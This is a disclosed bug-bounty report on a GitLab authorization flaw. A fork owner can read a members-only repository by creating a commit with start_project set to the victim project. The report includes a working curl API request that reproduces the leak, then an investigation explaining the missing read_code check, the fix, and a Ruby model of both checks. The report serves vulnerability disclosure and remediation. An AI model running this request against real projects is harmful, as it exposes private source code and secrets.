Leaking source code of restricted project through a fork
HackerOne report #2027967 by shells3c
on 2023-06-15, assigned to @ottilia_westerlund:
Report
Summary
The codebase of any project that has Repository visibility set to Only Project Members can be leaked if it has a fork out there
Steps to reproduce
- Victim account creates a public project
- Attacker account forks this project
- Victim account sets the Repository visibility of the project to Only Project Members, and then creates a file, let's say `secret.txt`, with some secret inside it
- As the attacker, execute this command:

```
curl --request POST \
  --form "start_project=<victim_project_id>" \
  --form "branch=steal" \
  --form "commit_message=some commit message" \
  --form "start_branch=<victim_project_branch>" \
  --form "actions[][action]=create" \
  --form "actions[][file_path]=foo" \
  --form "actions[][content]=bar" \
  --header "PRIVATE-TOKEN: <attacker_access_token>" \
  "https://gitlab.com/api/v4/projects/<attacker_project_id>/repository/commits"
```

with:

- `<attacker_access_token>` is the access token of the attacker account
- `<attacker_project_id>` is the project ID or URL-encoded path of the attacker project, which is the fork
- `<victim_project_id>` is the project ID or URL-encoded path of the victim project
- `<victim_project_branch>` is the branch that you want to steal the code from. In this test, you can use `main`

- Attacker account visits the fork, switches to branch `steal` to read `secret.txt`
Output of checks
This bug happens on GitLab.com
Impact
Disclosure of restricted project's source code by using a fork
Investigation (by @vyaklushin)
Here we verify that the user has access to the project, but we don't check if the user has access to the code.
We do a `read_project` check -> which is successful, but we don't do a `read_code` check that is necessary to ensure the code is accessible.
A validation like this one should help.

```
can?(current_user, :read_code, start_project)
```

We should also check user permissions in `Files::MultiService` to prevent this bug from appearing again.
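As an added example (not GitLab's code), a minimal Ruby model of the authorization gap the investigation describes: the `ProjectPolicy` class, the `read_project?`/`read_code?` abilities and the constructed `VICTIM` project are assumptions; it places the vulnerable `start_project` validation (read_project only) beside the fixed one (read_project and read_code).

```ruby
require 'set'

# Constructed model (hypothetical names, not GitLab's code): a project whose
# repository can be restricted to members even while the project stays public.
Project = Struct.new(:id, :visibility, :repository_access, :members, keyword_init: true)

class ProjectPolicy
  def initialize(user, project)
    @user = user
    @project = project
  end

  # read_project: the user may see the project at all (public, or a member).
  def read_project?
    @project.visibility == :public || @project.members.include?(@user)
  end

  # read_code: the user may read repository contents. With repository access
  # set to "Only Project Members" this is stricter than read_project.
  def read_code?
    return false unless read_project?
    @project.repository_access == :everyone || @project.members.include?(@user)
  end
end

def can?(user, ability, project)
  ProjectPolicy.new(user, project).public_send("#{ability}?")
end

# Vulnerable validation: a start_project is accepted on read_project alone, so a
# fork owner can branch from a repository they are no longer allowed to read.
def start_project_allowed_vulnerable?(user, start_project)
  can?(user, :read_project, start_project)
end

# Fixed validation: additionally require read_code on the start project, as the
# investigation note proposes.
def start_project_allowed_fixed?(user, start_project)
  can?(user, :read_project, start_project) && can?(user, :read_code, start_project)
end

# Sample project (constructed): public, but its repository was restricted to
# members after the fork was taken.
VICTIM = Project.new(id: 1, visibility: :public, repository_access: :members_only,
                     members: Set['victim'])

if __FILE__ == $PROGRAM_NAME
  puts "vulnerable check accepts victim as start_project: #{start_project_allowed_vulnerable?('attacker', VICTIM)}"
  puts "fixed check accepts victim as start_project: #{start_project_allowed_fixed?('attacker', VICTIM)}"
end
```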